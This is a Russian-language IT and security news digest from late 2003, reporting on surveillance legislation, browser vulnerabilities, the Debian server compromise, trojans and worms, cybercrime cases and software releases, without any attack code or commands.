Минсвязи РФ готовит 36 постановлений правительства в дополнение к закону "О связи", сообщил в пятницу, 28 ноября, в Совете Федерации РФ на заседании круглого стола, посвященного законодательному обеспечению развития телекоммуникационных систем в РФ, заместитель министра по связи и информатизации РФ Борис Антонюк. По его словам, сейчас еще идет разработка этих документов. Проекты постановлений, по словам г-на Антонюка, будут готовы к февралю 2004 г. Затем они будут представлены на доработку рабочим группам, в состав которых, по словам замминистра, пригласят представителей альтернативных операторов связи. Суть некоторых поправок к закону заключается в том, что передача голосового трафика по IP-сетям должна регулироваться государством. По словам г-на Антонюка, "механизм регулирования пока не разработан не только в России, но и во всем мире, и во всем мире этот вопрос является актуальным". В качестве примера он привел ситуацию в США, когда после терактов в Нью-Йорке 11 сентября 2001 г. спецслужбы испытывали затруднения при расследовании из-за невозможности прослушать телефонные разговоры, так как 95% голосового трафика передается по IP-сетям. "Закон должен прописать механизм доступа к IP-сетям", - подчеркнул замминистра, вновь отметив, что если по IP-сетям передается голосовой трафик, то этот процесс должен регулироваться государством. Источник - http://www.rbc.ru/
1/12/2003 11:14 И ещё раз к уязвимостям в IE.
Как мы сообщали ранее, исследователь компьютерной безопасности Лю Ди Ю сообщил об обнаружении целого семейства уязвимостей в популярном в мире пользователей ОС Windows браузере Internet Explorer версии 6 со всеми установленными патчами. Датская секьюрити-фирма Secunia предупредила, что вкупе ошибки позволяют атакующему исполнять на машине пользователя злонамеренный код. Информация об уязвимости опубликована на специальных электронных досках объявлений и предположительно проявляется в ПК, на которых установлен последний патч Microsoft. До выхода нового патча владельцам ПК рекомендуется отключить активные скрипты в Internet Explorer или использовать другой браузер. Инструкции по отключению активных скриптов (что может помешать нормальной работе с некоторыми сайтами) содержатся на странице Computer Emergency Response Team. Одна из ошибок позволяет исполнять скрипты, предназначенные для одного домена безопасности (например, Internet), с привилегиями другого домена (например, My Computer). Secunia утверждает, что она убедилась в наличии этой ошибки в IE 6, но проблема может затрагивать и более ранние версии браузера. Рекомендации CERT - http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps
30/11/2003 19:48 Украина: средствами мониторинга оборудованы до десятка интернет-узлов.
По данным СБУ, в Украине средствами мониторинга оборудованы до десятка интернет-узлов. По альтернативным данным, таких узлов насчитывается до 50, передает Интерфакс-Украина. Четыре интернет-узла, оборудованных средствами мониторинга, принадлежат провайдерам, которые внесены в реестр провайдеров, имеющих право предоставлять услуги государственным органам (это GlobalUkraine, "Инфоком", Elvisti и "УкрСат"), сообщил заместитель председателя Службы безопасности Украины Анатолий Герасимов на общественных слушаниях проекта закона "О мониторинге телекоммуникаций" в среду, 26 ноября. В соответствии с приказом Госкомитета связи №122 от 17 июня 2002 года, одним из условий внесения провайдеров в указанный реестр является установка мониторингового оборудования. В то же время, во время обсуждения прозвучали экспертные оценки, в соответствии с которыми в Украине есть около 50 интернет-узлов, оборудованных спецсредствами. По мнению руководителя интернет-провайдера "Релком-Украина" Алексея Бурсука, до принятия закона "О мониторинге телекоммуникаций" оборудование интернет-узлов таким оборудованием является незаконным. "Таким образом, происходит нарушение конституционных прав граждан на тайну переписки, и виновные в этом должны быть наказаны", - считает он. Подробнее - http://www.crime-research.ru/news/2003/11/2804.html
30/11/2003 19:31 Появился VMWare-драйвер для QNX4.
Как сообщает www.nixp.ru, вышел драйвер для виртуальной машины VMWare под ОС QNX4. В пакет входит графический драйвер для Photon (графическая среда в QNX) и vmtool для получения доступа к информации VMWare. Автор планирует официально выпустить этот релиз на developer.qnx.com, если у него появится время, т.к. сейчас все усиленно заняты работой над QNX 6.3. Также вскоре ожидается и версия драйвера для QNX6. Подробности - http://www.openqnx.com/Article215.html
30/11/2003 18:27 AT&T начала "разборки" с "безопасными" платёжными системами.
Корпорация AT&T подала в суд на интернет-аукцион eBay и принадлежащую ему платёжную систему PayPal, пишет Chicago Tribune. Суть претензий – нарушение прав на выданный истцу патент. AT&T, в своё время, запатентовала такую разновидность платежных систем, при которой покупатель предоставляет данные о своей кредитной карте не продавцу, а самой этой системе. Как известно, непосредственная передача номера кредитки чревата опасностями, связанными с тем, что торговцы-мошенники используют полученные данные с целью собственного нажива в ущерб владельцам карт. Однако проблема решается, если номер и другая информация о кредитной карте вводятся не на сайте интернет-магазина, а на странице платёжной системы, к которой подключён продавец и которая сама осуществляет все дальнейшие финансовые операции. Такой способ применяется, в том числе, и российскими платёжными системами "Ассист" и “Киберплат”. Но вот их американским коллегам придётся теперь или договариваться с AT&T , или отстаивать свои права в суде. Источник - http://www.runet.ru
30/11/2003 17:55 Хакер лишил одно из предприятий Ямала 300 тысяч рублей.
Российская глубинка часто становится источником если не легендарных, то полуанекдотитеческих историй о разгуле киберпреступности. Большинство нарушений закона сводятся к банальному использованию чужого пароля на доступ к Интернету. Иногда такие истории вырастают в показательные суды, "героями" которых чаще всего становятся школьники или студенты. 27 ноября в дежурную часть УВД города Губкинский (Ямало-Ненецкий автономный округ) поступило заявление от директора одного из местных предприятий. В нем говорилось, что с июня 2003 года неустановленное лицо незаконно использовал пароль предприятия для входа в Интернет, сообщает ИА "NewsProm.Ru" и "Internet.ru". Удивление вызывает уже сам факт, что "утечка Интернета" обнаружилась спустя полгода после начала незаконного использования пароля. Но еще большее удивление способен вызвать тот факт, что в заявлении указана сумма ущерба в размере 301309 рублей. В настоящее время по факту незаконного использования пароля проводится проверка. Похоже аккаунтом пострадавшего предприятия пользовался не только сам "хакер", но и весь город с близлежащими поселками. Источник - http://www.securitylab.ru
30/11/2003 16:08 Выход Linux 2.4.23.
Как сообщает linux.org.ru, вышло ядро 2.4.23. Вкратце из сделанного: - Множество исправлений и обновлений в ACPI, USB, Netfilter, сетевой подсистеме, драйверах и др. - Крупные вливания патчей VM-подсистемы из ветви -aa. Больше нет oom killer'а. - SCTP -- новый транспортный протокол уровня TCP и UDP. - IP Virtual Server. Подробности - http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.23
30/11/2003 15:50 "Помощник" для IDS-системы.
Компания Sourcefire выпустила приставку Real-Time Network Awareness (RNA), способную идентифицировать серверы, точки доступа, маршрутизаторы и иные устройства в своей подсети, а также многие из используемых в ней приложений. Устройство определяет топологию сети, анализируя проходящий через него трафик в пассивном режиме. Полученные сведения передаются на консоль управления приставкой. По словам представителя компании, устройство способно повысить эффективность работы систем распознавания вторжения, передавая подробную информацию об охраняемых ими сетях. Без таких сведений IDS-системы обычно имеют высокий коэффициент ложных срабатываний, снижение которого требует кропотливой работы по настройке. В планы Sourcefire входит разработка механизма автоматической передачи информации от RNA на IDS-системы. Основателем и директором Sourcefire по технологиям является Марти Реш, разработчик IDS-сканера с открытым кодом Snort. Источник - http://www.osp.ru
29/11/2003 19:21 Microsoft выпускает "заплатки" на CD.
Компания Secunia сообщила про очередную серию критических ошибок в IE6. Те же самые уязвимости присутствуют и в версиях браузера 5.01 и 5.5. Среди возникающих проблем – переадресация, кросс-скриптование и взлом ПК. Фактически существует пять проблем в одной, и, по мнению компании, её решение заключается в отключении функции Active Scripting или использовании другого продукта. Более подробно с проблемой можно ознакомиться здесь. В это же время Microsoft собирается выпустить обновления защиты на отдельном СD для пользователей более старых версий своей ОС, у которых отсутствует надежная и качественная интернет-связь. Для бета-тестирования этого выпуска были приглашены тестеры, использующие Windows 98, Windows 98 Second Edition и Windows Millennium, а в подборку заплат вошли патчи, которые находятся на сайте Windows Update. Компания не сообщает точную дату выхода нового компакта, однако известно, что бета-версия будет доступна лишь до 5 декабря. Сам же диск был создан как реакция на многочисленную критику в адрес Microsoft по поводу большого размера файлов-заплат, которые игнорируются поэтому многими пользователями с коммутируемым доступом в Сеть. Источник - http://www.cnews.ru
28/11/2003 13:17 Серверы Microsoft ежемесячно атакуют 100 тысяч хакеров.
Как сообщается на www.viruslist.com, корпоративная сеть Microsoft, состоящая из 300 тысяч рабочих станций и 4,2 тысяч серверов, ежемесячно подвергается 100 тысячам попыток проникновения хакеров и получает около 125 тысяч электронных писем с вредоносными программами. Количество писем со спамом, ежедневно приходящих в Microsoft, достигает 2,4 миллиона. Таковы результаты официального отчета компании, опубликованные на сайте газеты El Mundo. В 29-страничном отчете «Безопасность в Microsoft» подробно объясняется, какие методы и технологии защиты корпоративной сети использует специальное подразделение компании, ответственное за обеспечение безопасности. В числе защитных средств указаны смарт-карты, которыми около 65 тысяч сотрудников Microsoft пользуются для доступа к электронной почте или при работе с удаленных компьютеров. Подробности - http://www.elmundo.es/navegante/2003/11/25/seguridad/1069751729.html
28/11/2003 13:10 Набор сетевых утилит для Python.
Core Security Technologies анонсировала сетевые утилиты для работы с языком скриптов Python (хотя, скорее всего, объявила об их обновлении). Итак, доступны следующие 3 утилиты: Pcapy, Impacket, InlineEgg. Pcapy представляет собой модуль Питона для работы с библиотекой захвата пакетоы pcap, применяемой (например) для написания различных снифферов. Impacket представляет собой набор классов языка Питон для работы с различными сетевыми протоколами. InlineEgg представляет собой модуль Питона, обеспечивающего интерфейс к языку Ассемблера. ссылка - http://oss.coresecurity.com/
28/11/2003 12:07 "Старнет" (Москва) защищает сеть.
Московский оператор территориальных ethernet-сетей "Старнет" объявил о начинающемся внедрении VPN-технологии защиты наших сетей от несанкционированного использования IP-адресов. Внедрение VPN защитит пользователей компаний от действий нелегалов и обеспечит защищенность передаваемой информации путем ее шифрования. Источник - http://www.provider.net.ru
28/11/2003 11:55 Подробности взлома cерверов проекта Debian.
В конференции сайта debian.org раскрыты многие детали взлома серверов проекта Debian. Как пишет James Troup, Сначала вошли на машину под именем klecker.debian.org от имени зарегистрированного эккаунта непривилегированного пользователя, пароль которого был перехвачен обычным сниффером (это произошло около 5 вечера 19 ноября. После этого были получены права суперпользователя и был установлен руткит suckit. В дальнейшем атака была распространена на остальные машины: master, murphy, gluck. Об инциденте узнали по логам системы aide, мониторящей целостность файловой системы, после чего все машины были отключены от сети для дальнейшего анализа случившегося и поиска изменённых файлов, поскольку распространение оных могло привести к печальным последствиям. По поводу получения прав суперпользователя даётся следующее пояснение: якобы несколько машин не были пропатчены от уязвимости системного вызова ptrace в ядре. На машине master кроме того, имелись непропатченные suid-бинарники. В отчёте также описана работы руткита suckit - настоятельно рекомендую почитать отчёт - довольно поучительно. ;) Подробнее - http://lists.debian.org/debian-devel-announce/2003/...
28/11/2003 11:32 IE положит конец pop-up рекламе?
Pop-up реклама (основанная на автоматическом открытии нового окна браузера) процветает годами, несмотря на бесчисленные попытки ее искоренения. И все же самому ненавистному формату рекламы в вебе нашелся достойный противник — Microsoft. Интернет-рекламщики этим всерьез обеспокоены. Недавно софтверный гигант дал понять, что в будущем году в рамках обновления Windows ХР он введет в Internet Explorer (IE) средства блокирования pop-up рекламы. Аналогичные инструменты предлагают и другие, но ввиду бесспорного доминирования IE на рынке браузеров на этот раз pop-up пузырь действительно может, наконец, лопнуть, полагают руководители рекламных отделов и эксперты. «Если Microsoft это сделает, мы увидим радикальное сокращение использования pop-up рекламы», — говорит известный специалист по защите информации Ричард Смит. Боясь потерять один из наиболее эффективных маркетинговых инструментов, некоторые издатели и рекламодатели ищут способы обойти блокировки pop-up и продолжить доставку своей рекламы. Однако вместо того, чтобы идти против течения, многие присоединяются к нему, отказываясь от своих любимых форматов рекламы. Подробности - http://news.com.com/2100-1024_3-5110805.html?tag=nefd_pop
27/11/2003 18:05 1Мб на SIM-карте.
Компании Oberthur Card Systems и STMicroelectronics специально для итальянского оператора TIM разработали SIM-карту с объемом оперативной памяти в 1Мб. Карта основана на 32-х битном процессоре производства STMicroelectronics и работает под управлением ОС Oberthur. Взаимодействие с картой происходит по стандарту ISO 7816. Сообщается, что карта будет использоваться для аутентификации и оказания дополнительных сервисов не только абонентов GSM, но и UMTS и WLAN. У нас же особо продвинутые пользователи могут не дожидаться подобных инициатив со стороны российских операторов мобильной связи. Во многих мобильных форумах уже описана процедура клонирования SIM-карты, в результате которой пользователь может получить SIM-карту с бОльшим объемом памяти для хранения контактов или SMS. Проблематичной остается юридическая сторона такой операции, так как в большинстве контрактов на оказание услуг мобильной связи указано, что SIM-карта является собственностью оператора, и, соответственно, ее взлом/копирование может повлечь за собой судебные санкции. Источник - http://www.mobile-review.com
27/11/2003 17:02 Opera исправила уязвимости.
Норвежский разработчик ПО Opera выпустил новую версию своего браузера, в которой исправлены уязвимости, позволявшие злоумышленнику получать удаленный доступ к компьютеру-жертве. Кроме того усовершенствована реализация протокола OpenSSL. Версии браузера с 7 по 7.22 для ОС Windows и Linux содержат эти изъяны в безопасности, связанные с реализацией возможности изменения внешнего вида приложения. Об ошибках в браузере сообщил 12 ноября финский программист Юко Пиннонен (Jouko Pynnonen). Источник - http://www.cnews.ru
27/11/2003 16:47 Cтатья "О доказательственном значении лог-файлов".
Периодически всплывает вопрос в сетевом сообществе, смысл которого сводится к тому, являются ли лог-файлы сервера доказательством в суде при рассмотрении дел о взломе этих самых серверов. С одной стороны, именно лог-файлы являются одной из доказательных баз, согласно которой можно подтвердить факт взлома (или попытки взлома). С другой стороны, ни для кого не секрет, что администратор сервера может сам корректировать эти лог-файлы. В статье Игоря Собецкого проводится анализ сложившейся ситуации. Статья - http://www.crime-research.org/library/Sobeck0103.html
27/11/2003 16:16 В Алтайском крае организации, "потерпевшие" от хакера, отказались привлекать его к суду.
В Барнауле прокуратура Железнодорожного района прекратила дело по обвинению студента третьего курса экономического факультета Алтайской академии экономики и права в компьютерном мошенничестве. Между тем обвиняемый Игорь К. с помощью Интернета обманул восемь солидных организаций, воспользовавшись их виртуальным "карманом". Как сообщила газета "Молодежь Алтая", со ссылкой на официальные документы, Игорь К. "совершил несанкционированный доступ к компьютерной информации, повлекший ее копирование и неоднократное причинение имущественного ущерба без признаков хищения". Студент очень много времени проводил в Интернете, но это требовало и много денег. И тогда ему пришла в голову идея применить полученные знания на практике попользоваться чужим виртуальным карманом. Он вошел в базу IP-адресов пользователей, подключенных к сети в ОАО "Сибирьтелеком", расшифровал логин и пароль ЗАО "Алтайталь" и стал пользоваться Интернетом "безвозмездно". В следующий раз Игорь таким же образом использовал земельную кадастровую палату. Потом Автоцентр КамАЗ, ООО "Медич", Алтайский ЦГМС, ООО "Теплоцентр" и одно частное лицо. Прокурор Железнодорожного района Валерий Чернобровкин назвал это преступление высокоинтелектуальным. А дело, по его словам, прекращено по ходатайству... потерпевших. Источник - http://www.amic.ru
27/11/2003 15:21 Phoenix закручивает гайки в BIOS.
Программная прослойка между операционной системой и аппаратурой ПК десятилетиями остается почти неизменной. Теперь Phoenix Technologies решила повысить ее безопасность, удобство работы и защиту от копирования. Phoenix, один из крупнейших производителей BIOS (basic input/output system), выпустила первый из семейства продуктов нового поколения, которые, как она обещает, будут стимулировать развитие «коммунальных вычислений» и воспрепятствуют несанкционированному использованию защищенной интеллектуальной собственности. Анонсированная на этой неделе система Core Managed Environment (CME) TrustedCore NB для ноутбуков и планшетных ПК — первый продукт Phoenix категории Core System Software (CSS), расширяющий возможности скромной BIOS. Он позволит предприятиям обезопасить свои мобильные компьютеры от кражи паролей, несанкционированного доступа к сети и потери данных. В BIOS планируется также ввести средства управления цифровыми правами (digital rights management, DRM) и теснее интегрировать ее с Windows. Phoenix CSS представляет собой BIOS следующего поколения — с усиленной интеграцией с операционной системой и аппаратурой, что облегчает системным администраторам, например, дистанционное управление конфигурацией оборудования своих систем. Она построена на архитектуре Phoenix Device-Networked Architecture (D-NA) и следует тенденции, направленной на введение в продукты Microsoft, Intel и других китов информационных технологий поддержки на более низком уровне «надежных вычислений» (trustworthy computing). Подробнее - http://news.com.com/2100-7339_3-5111993.html?tag=nefd_top
27/11/2003 15:09 Первый вирусописатель-испанец арестован из-за собственной глупости.
В Испании арестован автор компьютерного вируса Worm.Win32.Raleka. Задержанию поспособствовал сам преступник, оставивший свою подпись на сайте с вредоносной программой. Об этом корреспонденту испанской газеты El Mundo сообщил представитель уголовной полиции Испании Хуан Салом Клотет (Juan Salom Clotet). По словам Клотета, если бы не небрежность автора вируса, поразившего в августе этого года около 120 тысяч компьютеров, поиски преступника продолжались бы до сих пор: «Определить происхождение вируса - очень трудная задача». Арест создателя Kelar - первый подобный случай в испанской уголовной практике, поскольку главным фигурантом в нем является гражданин Испании. Следствие по делу Kelar началось 28 августа, после того как полицейские получили сигнал о появлении этого вируса от производителя антивирусного программного обеспечения Panda. Создатель вируса Kelar получал контроль над зараженными машинами и, используя их, мог атаковать другие компьютеры. На начальном этапе расследования полиция вышла на хакерскую группу Akelarre, одним из членов которой являлся человек под псевдонимом 900K («король 900»). Указанный ник фигурировал на сайте, с которого и распространялся вирус Kelar. Несмотря на то, что при регистрации сайта 900K использовал вымышленное имя и адрес электронной почты, полиция смогла установить его настоящие данные. Это стало возможным после того, как в отделении «Банка Мадрида» был обнаружен счет, с которого владелец сайта оплачивал услуги по предоставлению домена. Источник - http://www.viruslist.com
27/11/2003 14:56 "Черный ящик" или государственное регулирование украинского Интернета.
В киевском офисе «Укртелеком» прошел круглый стол «Интернет как путь к демократии», посвященный принятию Верховной Радой Украины нескольких законопроектов, разработанных силовыми стуктурами, и направленных на введение государственного регулирования Интернета и противодействия киберпреступности. По словам официальных лиц службы безопасности Украины, по новым законам действительно будет введен мониторинг информации в Интернете для проведения оперативно-розыскной деятельности, однако доступ к «черным ящикам», установленным у каждого поставщика услуг Интернет, будет строго ограничен и доступен только высокопоставленным офицерам по специальным разрешениям. Эти новшества вызвали резко негативную реакцию украинской общественности и международного сообщества. Несмотря на такие разъяснения, украинские правозащитные организации имеют свое особое мнение по этому вопросу. Президент Исполнительного совета всеукраинской общественной организации «Украинская интернет-спильнота» Игорь Дядюра считает, что в настоящее время в Украине наблюдается масштабная атака спецслужб на свободу Интернета и телекоммуникации: «Это можно видеть на примере трех законопроектов. Во-первых, в целом уже принят закон «О телекоммуникациях», содержащий норму тотальной прослушки путем установки спецаппаратуры у каждого провайдера за счет оператора. Во-вторых, внесен проект закона «О мониторинге телекоммуникаций». И в первом чтении принят законопроект «О деятельности в сфере информатизации». Он содержит такие нормы, как «цифровые данные - это любые данные в электрической форме». То есть, теперь, втыкая вилку в розетку 220 вольт, вам нужно брать на это разрешение чуть ли не в СБУ." О новости сообщил sensing. Источник - http://www.crime-research.ru/
26/11/2003 18:51 Пользователям MS IE 6.0 угрожает опасность.
Речь, как сообщает The Register со ссылкой на китайского специалиста в области компьютерной безопасности Лю Ди Ю (Liu Die Yu), идет об ошибках в реализации так называемых «зон безопасности» в браузерах компании Microsoft. Хакер, являющийся адептом комплексного подхода к сетевым атакам, может использовать комбинацию этих ошибок для получения почти полного контроля над компьютером своей потенциальной жертвы. Microsoft пока не подготовила соответствующих заплаток, поэтому Лю Ди Ю пока не спешит разглашать подробности, касающихся найденных им ошибок. Тем не менее, экспериментальная проверка, проведенная с помощью нескольких тестовых программ, доказала, что браузеры MS IE 6.0 действительно беззащитны против некоторых типов сетевых атак. В частности, хакер может без труда устанавливать на компьютеры своих жертв исполняемые программы, вроде вирусов, троянов и автоматических «звонилок», заставляющих компьютеры прозваниваться на платные сервисы «для взрослых». Пока готовой защиты нет, эксперты рекомендуют всем пользователям браузеров Microsoft отключить систему Active scripting (Tools/Internet options/Security/Custom Level...) или же попользоваться продуктами сторонних производителей, благо их сейчас хватает. Источник - http://www.internet.ru
26/11/2003 18:38 Троян Sysbug-A.
Новый троян вновь играет на похотливом любопытстве и безалаберности пользователей. Вирусописатель потрудился придумать целую историю, чтобы заинтересовать свои жертвы непристойными фотографиями, которые находятся в инфицированном приложении. Эксперты назвали сетевую напасть - Sysbug-A. Вирус пытается умыкнуть конфиденциальную информацию, включая пароль доступа, чтобы над зараженной машиной можно было установить удаленный контроль. Sysbug-A приходит в электронные ящики от james2003@hotmail.com с темой "Re[2]Mary" and an attachment called "Private.ZIP ( Wendynakedjpg.exe)". Сообщение представляет собой любовное письмо Джеймса к Мэри, где он просит прощения за то, что они занимались сексом без презерватива. Здесь же отмечается, что в приложение содержатся их фотографии, которые они сделали ночью во время понятно чего. Как обычно, Sysbug-A рассчитан на ПК с ОС от компании Microsoft. Он копирует себя в папку Windows, как sysdeb32.exe и создает файлы svc.sav в означенной директории и C:\temp35.txt. По словам представителей компании Sophos, данные документы не представляют опасности и их можно просто удалить, - свидетельствует Web-User.Co.Uk. Источник - http://www.runet.ru
26/11/2003 18:30 Apple выпустила обновления для ОС Panther и Jaguar.
Компания Apple выпустила заплатки для операционных систем MacOS 10.2 Jaguar и 10.3 Panther. Заплатки предназначены для установки в последние версии этих операционных систем с порядковыми номерами 10.2.8 и 10.3.1 соответственно. В обоих патчах исправляются дыры, обнаруженные в пакете OpenSSL, служащим для реализации безопасного подключения к веб-сайтам по протоколу Secure Socket Layer (SSL). Еще в октябре в OpenSSL были обнаружены несколько дыр, позволяющих хакерам осуществлять DoS-атаки. Разработчики пакета достаточно оперативно выпустили патч, а теперь эта заплатка внедрена и в обновление для MacOS. В обновлении для Jaguar помимо дыры в OpenSSL исправлены несколько других ошибок и недоработок. Источник - http://www.compulenta.ru
26/11/2003 18:15 SuSE выпускает бесплатную версию SuSE Linux 9.
В понедельник SuSE Linux приступила к распространению бесплатной версии своей новой настольной операционной системы, а во вторник планирует выпустить новую версию своего high-end продукта. Настольную версию SuSE Linux 9 компания начала продавать в октябре. Подождав месяц, заказчики, наконец, получили возможность скачать ее бесплатно. Они могут устанавливать операционную систему из сети или с жесткого диска, но не могут создавать инсталляционный CD, предупреждает компания. В загружаемой версии дистрибутива отсутствуют некоторые пакеты ПО, не подлежащие загрузке из-за лицензионных ограничений. Техническая поддержка тоже отсутствует. Во вторник SuSE планирует также выпустить свой high-end продукт SuSE Linux Enterprise Server (SLES) для корпоративных заказчиков с поддержкой новейших blade-серверов IBM и другими изменениями. Кроме того, новая SLES Service Pack 3 включает последнюю версию ядра Linux 2.4.21; в SLES 8 использовалась модифицированная версия 2.4.19. SLES, по сравнению с SuSE Linux 9, меняется не так быстро, недоступна для бесплатной загрузки, и новые функции включаются в нее после более тщательного тестирования. Источник - http://www.zdnet.ru
26/11/2003 18:01 Выход "Спамтест" No. 25.
Вышел очередной (25-й) номер электронного журнала "Спамтест", выпускаемый совместно компанией "Ашманов и Партнеры" и "Лабораторией Касперского". В этом номере: новости, распределенные методы обнаружения спама (часть 1), ответы на вопросы читателей. Журнал - http://www.kaspersky.ru/news.html?id=144252901
26/11/2003 17:46 «Гуманитарный» червь Welchia отключил банкоматы Diebold.
Так называемый «гуманитарный» червь Worm.Win32.Welchia поразил изготовленные компанией Diebold банкоматы, работающие под управлением операционной системы Windows XP Embedded, сообщает Security Focus. Зараженные банкоматы начинали активно искать другие машины, в операционной системе которых имелась уязвимость RPC DCOM. Именно этот недостаток Windows использовали при создании своих программ авторы Welchia и Lovesan. В результате повышенной сетевой активности Welchia сначала выводил из строя систему банковской защиты от внешних вторжений, а затем и вовсе отключал банкоматы. Указанный инцидент произошел в августе сразу в двух финансовых учреждениях, названия которых представители Diebold приводить отказались. О том, какое число банкоматов оказалось заражено Welchia также не сообщается. Отключение банкоматов Diebold - не первый случай вредного воздействия червя Welchia, который его авторы позиционируют как «противоядие» от Lovesan. Осенью в результате активности «гуманитарного червя» на несколько часов была парализована работа всех консульских представительств США. Источник - http://www.viruslist.com
26/11/2003 16:21 KM.RU объявил спаму "Карантин".
Почтовая служба портала KM.RU сообщила о внедрении новой функции защиты от спама – сервиса "Карантин". Этот метод защиты основан на глобальной аутентификации пользователей. Подобный метод применяется, в ряде коммерческих приложений, а также в некоторых платных почтовых сервисах. Эффективность метода исключительно высока, как сообщает пресс-служба компании, он позволяет отсеять 99% нежелательных писем. Схема работы сервиса такова: при получении письма от неизвестного адресата письмо отправляется в специальную папку "Карантин", отправитель помещается в карантинный список. При этом ему отправляется запрос, ответив на который отправитель будет идентифицирован и добавлен в белый список. Сообщение будет доставлено в папку "Входящие" только в том случае, если отправитель подтвердит его отправку. Отправителю достаточно сделать лишь одно подтверждение, после чего он автоматически заносится в белый список, и в следующий раз ему больше не придется этого делать, чтобы отправить вам письмо. Новая защита от спама рассчитана для домашнего и корпоративного использования. Метод работает как через веб-интерфейс, так и через почтовый клиент (POP3-протокол). "Карантин" поддерживает русский и английский языки. Защита от спама "Карантин" была разработана компанией "e-Style ISP". Источник - http://www.cnews.ru
26/11/2003 16:03 Что будет в Solaris 10.
Chris Rijk из Ace's Hardware опубликовал на сервере компании статью, в которой описывает основные новшества, которые ожидаются в грядущей версии OC Solaris 10, выпускаемой и поддерживаемой компанией Sun Microsystems. в частности ожидаются новая файловая система, обновленная подсистема TCP/IP, в том числе с подержкой offload engine - возможности, позволяющей значительно повысить производительность сетевых взаимодействий, fault management и многое другое. Статья - http://aceshardware.com/#75000449
26/11/2003 15:47 Очередная версия Linux выйдет в декабре.
Версия 2.6 ядра Linux ожидается в декабре и будет гораздо стабильнее по сравнению с предшествующей, утверждает программист, ответственный за ее выпуск. Текущая тестовая версия 2.6.0-test10 обещает быть последней, а сама 2.6.0 появится к концу года, «если только колеса капитально не слетят», сказал в интервью во вторник смотритель 2.6 Эндрю Мортон. Ядро Linux 2.6 содержит серьезные изменения по сравнению с версией 2.4, которую сегодня продают такие компании, как Red Hat и SuSE Linux. Одно из существенных усовершенствований заключается в возможности использования преимуществ мощных многопроцессорных серверов — то есть работы на рынке, где сегодня популярна Unix и куда пытается прорваться Microsoft. «При четырех или восьми процессорах ядро 2.4 уже выдыхается, — сказал Мортон. — Что же касается 2.6, то я очень удивлюсь, если что-то помешает ей масштабироваться до 32». Мортон — один из главных сподвижников Торвальдса (они называются «мейнтейнерами» и отвечают за различные компоненты Linux); сферой его ответственности является само ядро 2.6. В настоящее время оба программиста числятся сотрудниками финансируемого предприятиями отрасли консорциума Open Source Development Labs (OSDL). Мортон уверен, что к моменту выхода ядра 2.6.0 оно будет оттестировано гораздо лучше, чем 2.4.0. «2.6.0-test10 уже находится на уровне готовности примерно 2.4.17, — говорит он. — С ним мы работали гораздо больше, чем с 2.4». Подробности - http://zdnet.com.com/2100-1104_2-5111921.html
25/11/2003 16:07 Управление "К" ГУВД Москвы вышло на тропу войны.
В пятницу 21 ноября 2003 г., сотрудниками управления "К" г.Москвы была проведена первая широкомасштабная операция в Зеленограде (административный округ Москвы за пределами МКАД) по изъятию незаконно установленного проводного и радиооборудования передачи данных. По сообщению компании "СИнС-Телеком", в ходе операции "под горячую руку" сотрудников управления попал и коммутационный шкаф территориальной сети компании, установленный в корп. 1649 (здания на всей территории Зеленограда имеют единую сквозную нумерацию, не зависящую от улиц). Это вызвало перерыв в предоставлении услуг части абонентов сети. По сообщению "СИнС-Телекома", разобравшись в ситуации сотрудники милиции принесли руководству компании свои извинения и в тот же день вернули снятое оборудование, однако это произошло поздно вечером, так что в полном объеме восстановить связь удалось только в субботу. По заявлению неназванного руководителя оперативной группы, "с антеннами и сетями на чердаках Зеленограда царит беспорядок, и они не намерены с этим мириться". О количестве изъятой техники, принадлежащей любительским домашним сетям, информации пока нет. По всей видимости, после разгрома московской нелегальной ДС "АкадемНет", следует ожидать активизации деятельности правоохранительных органов по борьбе с нелегальными любительскими домашними сетями. Более подробно - http://www.provider.net.ru/news.php?ts=1069711703
25/11/2003 15:32 «DVD Джон» взломал iTunes.
Норвежский хакер, сломавший код DVD в 15 лет, вновь дал повод к скандалу. На этот раз от его рук пал популярнейший онлайновый музыкальный магазин компании Apple. Джон Йохансен создал программу «QTFairUse», которая позволяет серферам обхитрить анти-пиратское ПО сервиса iTunes и качать музыку совершенно бесплатно вместо того, чтобы раскошеливаться на 99 центов за каждую песню. Мало того, компьютерный ум Норвегии не поленился выложить свое творение в Интернет. Самое парадоксальное, что сделал он это аккурат к встрече в зале Фемиды с представителями киноиндустрии США. Дело в том, что 2 декабря в Осло судьи будут рассматривать апелляцию по делу о взломе кода DVD. Американская ассоциация кинематографистов обвиняет Йохансена в написании программы DeCSS, дешифрующей DVD, и распространении ее в мировой Сети. В свою защиту, Джон заявил, что придумал DeCSS для того, чтобы разработать DVD-плеер для операционной системы Linux, а не для массового копирования кинофильмов с дисков. И он не может нести ответственность за деятельность пиратов, которые воспользовались его достижениями в корыстных целях. Источник - http://www.runet.ru
25/11/2003 15:27 MS изучает возможную уязвимость Exchange 2003.
Как написано на www.bugtraq.ru, потенциальная уязвимость обнаружена в компоненте Outlook Web Access (OWA). Сообщается, что залогинившись с его помощью, пользователи случайным образом могут попасть в чужие почтовые ящики, причем с полными правами доступа. Предварительное расследование показало, что это вроде бы происходит при запрещенной Kerberos-аутентификации, но обнаруживший данную ошибку администратор настаивает на том, что ничего не запрещал и вообще использовал дефолтовую конфигурацию. Расследование продолжается, патч тестируется. Подробности - http://www.computerworld.com/securitytopics/security/story/0,10801,87506,00.html
25/11/2003 15:04 Intel объявила о создании чипов нового поколения.
Как сообщает lenta.ru, компания Intel объявила о разработке технологии, позволяющей значительно повысить производительность компьютерных чипов. В пресс-релизе на сайте корпорации говорится, что речь идет о технологии нового поколения. Повышение производительности достигается за счет уменьшения размера транзисторов и увеличения их числа на микросхеме. Инженерам Intel удалось создать прототип чипа на транзисторах с длиной затвора 35 нанометров, что почти в полтора раза меньше, чем у серийных транзисторов, которые используются при производстве процессоров Intel Pentium 4. Кроме того, новая технология предусматривает использование так называемого напряженного кремния (кремния с увеличенным расстоянием между узлами кристаллической решетки), специальных медных соединений и нового диэлектрика. Все это позволяет увеличить рабочий ток транзисторов и снизить энергопотребление. Подробности - http://www.intel.com/pressroom/archive/releases/20031124tech.htm?...
25/11/2003 13:22 Русская версия Office Online.
